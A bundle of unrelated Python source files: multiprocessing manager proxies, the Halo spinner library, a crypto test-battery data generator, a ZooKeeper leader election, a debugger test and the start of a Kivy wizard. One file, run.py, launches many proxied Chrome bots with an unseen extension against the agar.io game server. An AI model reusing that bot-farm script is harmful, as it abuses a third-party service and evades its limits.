return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
        exec('''def %s(self, *args, **kwds):
        return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
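# For example, MakeProxyType('FooProxy', ('bar',)) returns a BaseProxy subclass
# whose generated bar(*args, **kwds) method simply forwards to
# self._callmethod('bar', args, kwds); BaseListProxy, DictProxy and the other
# proxy types below are built this way.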
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = self.__dict__.items()
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
# XXX remove methods for Py3.0 and Py2.6
_exposed_ = ('__next__', 'next', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def next(self, *args):
return self._callmethod('next', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True):
return self._callmethod('acquire', (blocking,))
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
    # XXX will Condition.notifyAll() name be available in Py3.0?
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__delslice__',
'__getitem__', '__getslice__', '__len__', '__mul__',
'__reversed__', '__rmul__', '__setitem__', '__setslice__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__', '__getslice__', '__setslice__'
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
PoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'terminate'
))
PoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', Queue.Queue)
SyncManager.register('JoinableQueue', Queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Pool', Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
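#
# Minimal usage sketch (not part of the original module): start a SyncManager,
# create a couple of proxied objects via the typeids registered above, then
# shut the server process down again.  Application code would normally call
# multiprocessing.Manager() instead, which returns a started instance of
# SyncManager.
#
if __name__ == '__main__':
    manager = SyncManager()
    manager.start()
    try:
        d = manager.dict()          # DictProxy to a dict living in the server
        l = manager.list(range(3))  # ListProxy
        d['answer'] = 42
        l.append(99)
        print(d.copy())             # {'answer': 42}
        print(l[:])                 # [0, 1, 2, 99]
    finally:
        manager.shutdown()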
|
halo.py
|
# -*- coding: utf-8 -*-
# pylint: disable=unsubscriptable-object
"""Beautiful terminal spinners in Python.
"""
from __future__ import absolute_import, unicode_literals
import atexit
import functools
import sys
import threading
import time
import cursor
from log_symbols.symbols import LogSymbols
from spinners.spinners import Spinners
from halo._utils import (colored_frame, decode_utf_8_text, get_environment,
get_terminal_columns, is_supported, is_text_type,
encode_utf_8_text)
class Halo(object):
"""Halo library.
Attributes
----------
CLEAR_LINE : str
Code to clear the line
"""
CLEAR_LINE = '\033[K'
SPINNER_PLACEMENTS = ('left', 'right',)
def __init__(self, text='', color='cyan', text_color=None, spinner=None,
animation=None, placement='left', interval=-1, enabled=True, stream=sys.stdout):
"""Constructs the Halo object.
Parameters
----------
text : str, optional
Text to display.
text_color : str, optional
Color of the text.
color : str, optional
            Color of the spinner.
spinner : str|dict, optional
String or dictionary representing spinner. String can be one of 60+ spinners
supported.
animation: str, optional
Animation to apply if text is too large. Can be one of `bounce`, `marquee`.
Defaults to ellipses.
placement: str, optional
Side of the text to place the spinner on. Can be `left` or `right`.
Defaults to `left`.
interval : integer, optional
Interval between each frame of the spinner in milliseconds.
enabled : boolean, optional
Spinner enabled or not.
stream : io, optional
Output.
"""
self._color = color
self._animation = animation
self.spinner = spinner
self.text = text
self._text_color = text_color
self._interval = int(interval) if int(interval) > 0 else self._spinner['interval']
self._stream = stream
self.placement = placement
self._frame_index = 0
self._text_index = 0
self._spinner_thread = None
self._stop_spinner = None
self._spinner_id = None
self.enabled = enabled
environment = get_environment()
def clean_up():
"""Handle cell execution"""
self.stop()
if environment in ('ipython', 'jupyter'):
from IPython import get_ipython
ip = get_ipython()
ip.events.register('post_run_cell', clean_up)
else: # default terminal
atexit.register(clean_up)
def __enter__(self):
"""Starts the spinner on a separate thread. For use in context managers.
Returns
-------
self
"""
return self.start()
def __exit__(self, type, value, traceback):
"""Stops the spinner. For use in context managers."""
self.stop()
def __call__(self, f):
"""Allow the Halo object to be used as a regular function decorator."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
@property
def spinner(self):
"""Getter for spinner property.
Returns
-------
dict
spinner value
"""
return self._spinner
@spinner.setter
def spinner(self, spinner=None):
"""Setter for spinner property.
Parameters
----------
spinner : dict, str
Defines the spinner value with frame and interval
"""
self._spinner = self._get_spinner(spinner)
self._frame_index = 0
self._text_index = 0
@property
def text(self):
"""Getter for text property.
Returns
-------
str
text value
"""
return self._text['original']
@text.setter
def text(self, text):
"""Setter for text property.
Parameters
----------
text : str
Defines the text value for spinner
"""
self._text = self._get_text(text)
@property
def text_color(self):
"""Getter for text color property.
Returns
-------
str
text color value
"""
return self._text_color
@text_color.setter
def text_color(self, text_color):
"""Setter for text color property.
Parameters
----------
text_color : str
Defines the text color value for spinner
"""
self._text_color = text_color
@property
def color(self):
"""Getter for color property.
Returns
-------
str
color value
"""
return self._color
@color.setter
def color(self, color):
"""Setter for color property.
Parameters
----------
color : str
Defines the color value for spinner
"""
self._color = color
@property
def placement(self):
"""Getter for placement property.
Returns
-------
str
spinner placement
"""
return self._placement
@placement.setter
def placement(self, placement):
"""Setter for placement property.
Parameters
----------
placement: str
Defines the placement of the spinner
"""
if placement not in self.SPINNER_PLACEMENTS:
raise ValueError(
"Unknown spinner placement '{0}', available are {1}".format(placement, self.SPINNER_PLACEMENTS))
self._placement = placement
@property
def spinner_id(self):
"""Getter for spinner id
Returns
-------
str
Spinner id value
"""
return self._spinner_id
@property
def animation(self):
"""Getter for animation property.
Returns
-------
str
Spinner animation
"""
return self._animation
@animation.setter
def animation(self, animation):
"""Setter for animation property.
Parameters
----------
animation: str
Defines the animation of the spinner
"""
self._animation = animation
self._text = self._get_text(self._text['original'])
def _check_stream(self):
"""Returns whether the stream is open, and if applicable, writable
Returns
-------
bool
Whether the stream is open
"""
if self._stream.closed:
return False
try:
# Attribute access kept separate from invocation, to avoid
# swallowing AttributeErrors from the call which should bubble up.
check_stream_writable = self._stream.writable
except AttributeError:
pass
else:
return check_stream_writable()
return True
def _write(self, s):
"""Write to the stream, if writable
Parameters
----------
s : str
Characters to write to the stream
"""
if self._check_stream():
self._stream.write(s)
def _hide_cursor(self):
"""Disable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.hide(stream=self._stream)
def _show_cursor(self):
"""Re-enable the user's blinking cursor
"""
if self._check_stream() and self._stream.isatty():
cursor.show(stream=self._stream)
def _get_spinner(self, spinner):
"""Extracts spinner value from options and returns value
containing spinner frames and interval, defaults to 'dots' spinner.
Parameters
----------
spinner : dict, str
Contains spinner value or type of spinner to be used
Returns
-------
dict
Contains frames and interval defining spinner
"""
default_spinner = Spinners['dots'].value
if spinner and type(spinner) == dict:
return spinner
if is_supported():
if all([is_text_type(spinner), spinner in Spinners.__members__]):
return Spinners[spinner].value
else:
return default_spinner
else:
return Spinners['line'].value
def _get_text(self, text):
"""Creates frames based on the selected animation
Returns
-------
        dict
            Contains the original text and the frames to render
"""
animation = self._animation
stripped_text = text.strip()
# Check which frame of the animation is the widest
max_spinner_length = max([len(i) for i in self._spinner['frames']])
        # Subtract the max spinner length from the current terminal width
# (-1 to leave room for the extra space between spinner and text)
terminal_width = get_terminal_columns() - max_spinner_length - 1
text_length = len(stripped_text)
frames = []
if terminal_width < text_length and animation:
if animation == 'bounce':
"""
Make the text bounce back and forth
"""
for x in range(0, text_length - terminal_width + 1):
frames.append(stripped_text[x:terminal_width + x])
frames.extend(list(reversed(frames)))
            elif animation == 'marquee':
"""
Make the text scroll like a marquee
"""
stripped_text = stripped_text + ' ' + stripped_text[:terminal_width]
for x in range(0, text_length + 1):
frames.append(stripped_text[x:terminal_width + x])
elif terminal_width < text_length and not animation:
# Add ellipsis if text is larger than terminal width and no animation was specified
frames = [stripped_text[:terminal_width - 6] + ' (...)']
else:
frames = [stripped_text]
return {
'original': text,
'frames': frames
}
def clear(self):
"""Clears the line and returns cursor to the start.
of line
Returns
-------
self
"""
self._write('\r')
self._write(self.CLEAR_LINE)
return self
def _render_frame(self):
"""Renders the frame on the line after clearing it.
"""
if not self.enabled:
            # if the spinner was disabled (or the stream closed) while the
            # render thread is still running, skip writing this frame; the
            # frame index is left untouched so rendering resumes cleanly
            # if we are re-enabled.
return
self.clear()
frame = self.frame()
output = '\r{}'.format(frame)
try:
self._write(output)
except UnicodeEncodeError:
self._write(encode_utf_8_text(output))
def render(self):
"""Runs the render until thread flag is set.
Returns
-------
self
"""
while not self._stop_spinner.is_set():
self._render_frame()
time.sleep(0.001 * self._interval)
return self
def frame(self):
"""Builds and returns the frame to be rendered
Returns
-------
        str
            The frame to be rendered
"""
frames = self._spinner['frames']
frame = frames[self._frame_index]
if self._color:
frame = colored_frame(frame, self._color)
self._frame_index += 1
self._frame_index = self._frame_index % len(frames)
text_frame = self.text_frame()
return u'{0} {1}'.format(*[
(text_frame, frame)
if self._placement == 'right' else
(frame, text_frame)
][0])
def text_frame(self):
"""Builds and returns the text frame to be rendered
Returns
-------
        str
            The text frame to be rendered
"""
if len(self._text['frames']) == 1:
if self._text_color:
return colored_frame(self._text['frames'][0], self._text_color)
# Return first frame (can't return original text because at this point it might be ellipsed)
return self._text['frames'][0]
frames = self._text['frames']
frame = frames[self._text_index]
self._text_index += 1
self._text_index = self._text_index % len(frames)
if self._text_color:
return colored_frame(frame, self._text_color)
return frame
def start(self, text=None):
"""Starts the spinner on a separate thread.
Parameters
----------
text : None, optional
Text to be used alongside spinner
Returns
-------
self
"""
if text is not None:
self.text = text
if self._spinner_id is not None:
return self
if not (self.enabled and self._check_stream()):
return self
self._hide_cursor()
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop(self):
"""Stops the spinner and clears the line.
Returns
-------
self
"""
if self._spinner_thread and self._spinner_thread.is_alive():
self._stop_spinner.set()
self._spinner_thread.join()
if self.enabled:
self.clear()
self._frame_index = 0
self._spinner_id = None
self._show_cursor()
return self
def succeed(self, text=None):
"""Shows and persists success symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside success symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.SUCCESS.value, text=text)
def fail(self, text=None):
"""Shows and persists fail symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside fail symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.ERROR.value, text=text)
def warn(self, text=None):
"""Shows and persists warn symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside warn symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.WARNING.value, text=text)
def info(self, text=None):
"""Shows and persists info symbol and text and exits.
Parameters
----------
text : None, optional
Text to be shown alongside info symbol.
Returns
-------
self
"""
return self.stop_and_persist(symbol=LogSymbols.INFO.value, text=text)
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = u'{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
try:
self._stream.write(output)
except UnicodeEncodeError:
self._stream.write(encode_utf_8_text(output))
return self
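#
# Minimal usage sketch (not part of the library): the three common ways to
# drive the spinner -- explicit start()/succeed(), as a context manager, and
# as a decorator (via __call__).  The spinner name and texts are illustrative.
#
if __name__ == '__main__':
    spinner = Halo(text='Downloading', spinner='dots')
    spinner.start()
    time.sleep(1)
    spinner.succeed('Download finished')

    with Halo(text='Working inside a context manager'):
        time.sleep(1)

    @Halo(text='Working inside a decorated function')
    def job():
        time.sleep(1)

    job()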
|
testbatteries.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
import subprocess
import sys
import threading
import time
import traceback
from queue import Queue, Empty as QEmpty
from booltest import egenerator
from booltest import common
from booltest.booltest_main import *
logger = logging.getLogger(__name__)
coloredlogs.install(level=logging.DEBUG)
# Main - argument parsing + processing
class TestBatteries(Booltest):
"""
TestBatteries submits standard crypto functions to standard testing batteries for analysis.
"""
def __init__(self, *args, **kwargs):
super(TestBatteries, self).__init__(*args, **kwargs)
self.args = None
self.tester = None
self.input_poly = []
self.results_dir = None
self.generator_path = None
self.seed = '1fe40505e131963c'
self.data_to_gen = 0
self.config_js = None
self.cur_data_file = None # (tmpdir, config, file)
self.joq_queue = Queue()
self.res_map = {}
self.res_lock = threading.Lock()
def init_params(self):
"""
Parameter processing
:return:
"""
# Results dir
self.results_dir = self.args.results_dir
if self.results_dir is None:
logger.warning('Results dir is not defined, using current directory')
self.results_dir = os.getcwd()
elif not os.path.exists(self.results_dir):
os.makedirs(self.results_dir)
# Generator path
self.generator_path = self.args.generator_path
if self.generator_path is None:
logger.warning('Generator path is not given, using current directory')
self.generator_path = os.path.join(os.getcwd(), 'generator')
if not os.path.exists(self.generator_path):
raise ValueError('Generator not found: %s' % self.generator_path)
def gen_randomdir(self, function, round):
"""
Generates random directory name
:return:
"""
dirname = 'testbed-%s-r%s-%d-%d' % (function, round, int(time.time()), random.randint(0, 2**32-1))
return os.path.join('/tmp', dirname)
def find_data_file(self, function, round):
"""
Tries to find a data file
:param function:
:param round:
:return:
"""
data_dir = self.args.data_dir
if data_dir is None or not os.path.exists(data_dir):
            logger.info('Data dir not set or does not exist: %s' % data_dir)
return None
candidates = [
'%s_r%s_seed%s_%sMB.bin' % (function, round, self.seed, self.data_to_gen//1024//1024),
'%s_r%s_seed%s.bin' % (function, round, self.seed),
'%s_r%s_b8.bin' % (function, round),
'%s_r%s_b16.bin' % (function, round),
'%s_r%s_b32.bin' % (function, round),
'%s_r%s.bin' % (function, round),
'%s.bin' % function
]
for cand in candidates:
fpath = os.path.join(data_dir, cand)
if not os.path.exists(fpath):
continue
if os.path.getsize(fpath) < self.data_to_gen:
logger.info('File %s exists but is too small' % fpath)
continue
return fpath
return None
def data_generator(self, tmpdir, function, cur_round, config_js):
"""
Used to call generator to generate data to test. Prepares data to test.
If the file has already been generated, just returns the generated file.
:return:
"""
data_file = self.find_data_file(function=function, round=cur_round)
if data_file is not None:
logger.info('Data file found cached: %s' % data_file)
return data_file
# Egenerator procedure: new temp folder, generate config, generate data.
logger.info('Generating data for %s, round %s to %s' % (function, cur_round, tmpdir))
data_file = self.eacirc_generator(tmpdir=tmpdir, generator_path=self.generator_path, config_js=config_js)
return data_file
def eacirc_generator(self, tmpdir, generator_path, config_js):
"""
Uses Egenerator to produce the file
:param tmpdir:
:param generator_path:
:param config_js:
:return:
"""
os.makedirs(tmpdir)
new_generator_path = os.path.join(tmpdir, 'generator')
shutil.copy(generator_path, new_generator_path)
config_str = json.dumps(config_js, indent=2)
with open(os.path.join(tmpdir, 'generator.json'), 'w') as fh:
fh.write(config_str)
# Generate some data here
time.sleep(1)
p = subprocess.Popen(new_generator_path, shell=True, cwd=tmpdir)
p.communicate()
if p.returncode != 0:
logger.error('Could not generate data, genpath: %s, cwd: %s, code: %s'
% (new_generator_path, tmpdir, p.returncode))
return None
# Generated file:
data_files = [f for f in os.listdir(tmpdir) if os.path.isfile(os.path.join(tmpdir, f))
and f.endswith('bin')]
if len(data_files) != 1:
logger.error('Error in generating data to process. Files found: %s' % data_files)
return None
data_file = os.path.join(tmpdir, data_files[0])
return data_file
def clean_temp_dir(self, tmpdir):
"""
Cleans artifacts
:param tmpdir:
:return:
"""
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir, ignore_errors=True)
def is_function_egen(self, function):
"""
Returns true if function is generated by EAcirc generator
:param function:
:return:
"""
return function in egenerator.ROUNDS or function in egenerator.SHA3 or function in egenerator.ESTREAM
def get_test_battery(self):
"""
Returns function -> [r1, r2, r3, ...] to test on given number of rounds.
:return:
"""
battery = collections.OrderedDict()
battery['AES'] = [3]
battery['ARIRANG'] = [3]
battery['AURORA'] = [2]
battery['BLAKE'] = [1]
battery['Cheetah'] = [4]
battery['CubeHash'] = [0]
battery['DCH'] = [1]
battery['DECIM'] = [5]
battery['DynamicSHA2'] = [14]
battery['ECHO'] = [1]
battery['Grain'] = [2]
battery['Grostl'] = [2]
battery['Hamsi'] = [0]
battery['JH'] = [6]
battery['Keccak'] = [3]
battery['LEX'] = [3]
battery['Lesamnta'] = [2]
battery['Luffa'] = [7]
battery['MD6'] = [9]
battery['SIMD'] = [0]
battery['Salsa20'] = [4]
battery['TEA'] = [4]
battery['TSC-4'] = [14]
battery['Tangle'] = [25]
battery['Twister'] = [6]
        # Other tested functions, not (yet) included in egen.
battery['MD5'] = [15, 16, 17]
battery['SHA256'] = [3, 4]
battery['RC4'] = [1]
battery['RC4_Col'] = [1]
# PRNGs
battery['crand_aisa'] = [1]
battery['javarand'] = [1]
return battery
def worker_main(self, idx):
"""
Data gen worker method
:return:
"""
logger.info('Starting worker %d' % idx)
while True:
job = None
function, cur_round = None, None
try:
job = self.joq_queue.get_nowait()
function, cur_round = job
except QEmpty:
break
try:
tmpdir = self.gen_randomdir(function, cur_round)
if self.is_function_egen(function):
config_js = egenerator.get_config(function_name=function, rounds=cur_round, data=self.data_to_gen)
else:
config_js = {'algorithm': function, 'round': cur_round, 'seed': self.seed}
logger.info('Generating %s:%s' % (function, cur_round))
data_file = self.data_generator(tmpdir=tmpdir, function=function, cur_round=cur_round,
config_js=config_js)
if data_file is None:
logger.error('Data file is invalid')
continue
new_data_file = os.path.join(self.args.results_dir, os.path.basename(data_file))
if not os.path.exists(new_data_file) or not os.path.samefile(data_file, new_data_file):
logger.info("Copying to %s" % new_data_file)
shutil.copy(data_file, new_data_file)
cfgname = 'config_%s_r%d_%04dMB' % (function, cur_round, self.data_to_gen//1024//1024)
with open(os.path.join(self.args.results_dir, cfgname), 'w') as fh:
fh.write(json.dumps(config_js, indent=2))
with self.res_lock:
self.res_map[(function, cur_round)] = (data_file, cfgname, config_js)
logger.info('Generated %s:%s' % (function, cur_round))
# Remove test dir
self.clean_temp_dir(tmpdir)
except Exception as e:
logger.error('Exception when computing %s:%s : %s' % (function, cur_round, e))
logger.debug(traceback.format_exc())
sys.exit(1)
finally:
# Job finished
self.joq_queue.task_done()
logger.info('Terminating worker %d' % idx)
# noinspection PyBroadException
def work(self):
"""
Main entry point - data processing
:return:
"""
self.init_params()
# Init logic, analysis.
# Define test set.
test_sizes_mb = self.args.matrix_size
battery = self.get_test_battery()
functions = sorted(list(battery.keys()))
self.data_to_gen = max(test_sizes_mb) * 1024 * 1024
logger.info('Battery of functions to test: %s' % battery)
logger.info('Sizes to test: %s' % test_sizes_mb)
# Pre-allocate job queue
for function in functions:
for cur_round in battery[function]:
self.joq_queue.put((function, cur_round))
workers = []
for wrk in range(self.args.threads):
logger.info('manager: starting worker %d' % wrk)
t = threading.Thread(target=self.worker_main, args=(wrk, ))
t.setDaemon(True)
t.start()
workers.append(t)
        # Wait until all datasets are generated
        self.joq_queue.join()
        logger.info('The whole dataset generated')
# Generate bash script to submit experiments
bash = '#!/bin/bash\n'
for function in functions:
for cur_round in battery[function]:
for cur_size in self.args.matrix_size:
data_file, cfgname, config_js = self.res_map[(function, cur_round)]
test_name = '%s_r%d_%04dMB' % (function, cur_round, cur_size)
test_file = os.path.join(self.args.script_data, os.path.basename(data_file))
line = 'submit_experiment -e %s -n "%s" -c "/home/sample-configs/%dMB.json" -f "%s" -a\n' \
% (self.args.email, test_name, cur_size, test_file)
bash += line
bash_path = os.path.join(self.args.results_dir, 'submit.sh')
with open(bash_path, 'w') as fh:
fh.write(bash)
logger.info('Finished')
def main(self):
logger.debug('App started')
parser = argparse.ArgumentParser(description='Test with batteries')
parser.add_argument('--debug', dest='debug', action='store_const', const=True,
help='enables debug mode')
parser.add_argument('--verbose', dest='verbose', action='store_const', const=True,
help='enables verbose mode')
#
# Testbed related options
#
parser.add_argument('--threads', dest='threads', default=1, type=int,
help='Number of threads to gen data')
parser.add_argument('--email', dest='email', default=None,
                            help='Email to send results to')
parser.add_argument('--generator-path', dest='generator_path', default=None,
help='Path to the eacirc generator executable')
parser.add_argument('--result-dir', dest='results_dir', default=None,
help='Directory to put results to')
parser.add_argument('--data-dir', dest='data_dir', default=None,
help='Directory to load data from (precomputed samples to test)')
parser.add_argument('--script-data', dest='script_data', default=None,
help='Directory to load data from - in the benchmark script')
#
# Testing matrix definition
#
parser.add_argument('--matrix-size', dest='matrix_size', nargs=argparse.ZERO_OR_MORE,
default=[1, 10, 100, 1000], type=int,
help='List of data sizes to test in MB')
self.args = parser.parse_args()
if self.args.debug:
coloredlogs.install(level=logging.DEBUG)
self.work()
# Launcher
app = None
if __name__ == "__main__":
app = TestBatteries()
app.main()
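# Example invocation (illustrative only; the paths, sizes and e-mail below are
# placeholders, not files shipped with this repository):
#
#   python testbatteries.py \
#       --threads 4 \
#       --generator-path /opt/eacirc/generator \
#       --result-dir ./results \
#       --data-dir ./precomputed \
#       --script-data /storage/bench-data \
#       --matrix-size 1 10 100 \
#       --email user@example.com
#
# The workers generate (or reuse) one data file per (function, round), copy it
# next to a JSON generator config in --result-dir, and the run ends by writing
# results/submit.sh with one submit_experiment line per (function, round, size)
# combination.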
|
election.py
|
from __future__ import absolute_import, print_function
from kazoo.client import KazooClient
import os.path
import threading
from . import log
from . import state
ELECTION_PATH = '/dispatch/election'
class MasterElection(object):
def __init__(self):
self.zk = KazooClient(hosts=state.ARGS.zookeeper)
self.master_notified = False
self.my_node = None
self.zk.start() # Stop never called
self.zk.ensure_path(ELECTION_PATH)
def start_election(self, master_callback):
"""
Start the master election.
If this node is the master, the callback will be called once.
        :param master_callback: Called if this node is the master
"""
self.callback = master_callback
self.my_node = self.zk.create(ELECTION_PATH + '/n_',
ephemeral=True, sequence=True)
self.zk.get_children(ELECTION_PATH, watch=self._election_update)
self._election_update()
def _election_update(self, data=None):
def worker():
try:
self.master_notified = True
self.callback()
except Exception as e:
self.master_notified = False
log.info("Failed to activate master, redoing election: %r", e)
self.zk.delete(self.my_node)
self.my_node = self.zk.create(ELECTION_PATH + '/n_',
ephemeral=True, sequence=True)
self._election_update()
if not self.master_notified and \
sorted(self.zk.get_children(ELECTION_PATH))[0] == \
os.path.basename(self.my_node):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
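# Usage sketch (illustrative; assumes state.ARGS.zookeeper has been populated
# elsewhere with a ZooKeeper host string, as this module expects):
#
#   def become_master():
#       log.info("this node won the dispatch election")
#       # start master-only services here
#
#   election = MasterElection()
#   election.start_election(become_master)
#
# start_election() creates an ephemeral sequential znode under
# /dispatch/election; the node holding the lowest sequence number invokes the
# callback, and if the callback raises, the node re-registers itself and the
# election is evaluated again.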
|
_debugger_case_get_thread_stack.py
|
import threading
event_set = False
inner_started = False
def method():
global inner_started
inner_started = True
while not event_set:
import time
time.sleep(.1)
t = threading.Thread(target=method)
t.start()
while not inner_started:
import time
time.sleep(.1)
print('break here')
event_set = True
t.join()
print('TEST SUCEEDED!')
|
run.py
|
with open("./proxies") as f:
proxies = f.readlines()
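# Assumption: ./proxies lists one proxy per line in host:port form, as expected
# by Chrome's --proxy-server switch used below.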
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
import time
import random
import threading
bot_count = int(input("How many bots do you want to spawn? (too many will crash your pc/vps): "))
print "\nOkay good, now check the nodejs console; you should see 'Browser Connected UUID: XSAGHASGga'. If this doesn't show, one of two things has happened: they're patched, OR you need to update your proxies :)"
def bot():
try:
chromedriver = "chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
options = Options()
options.add_extension('loader.crx')
options.add_argument('--proxy-server='+random.choice(proxies))
driver = webdriver.Chrome(chrome_options=options)
driver.set_window_size(1, 1)
driver.get("http://agar.io")
#time.sleep(30) #slow proxies
    except Exception:
bot()
print "Opening browsers"
for a in range(bot_count):
t = threading.Thread(target=bot)
t.start()
time.sleep(0.2)
print "Waiting at least 30 seconds for all the proxies to load"
time.sleep(30)
print "Assuming some of the proxies managed to connect, if you don't see 'Browser Connected UUID: GDSAeageAEag' at least a few times on the nodejs console you should update your proxies :)"
while(1):
time.sleep(30)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
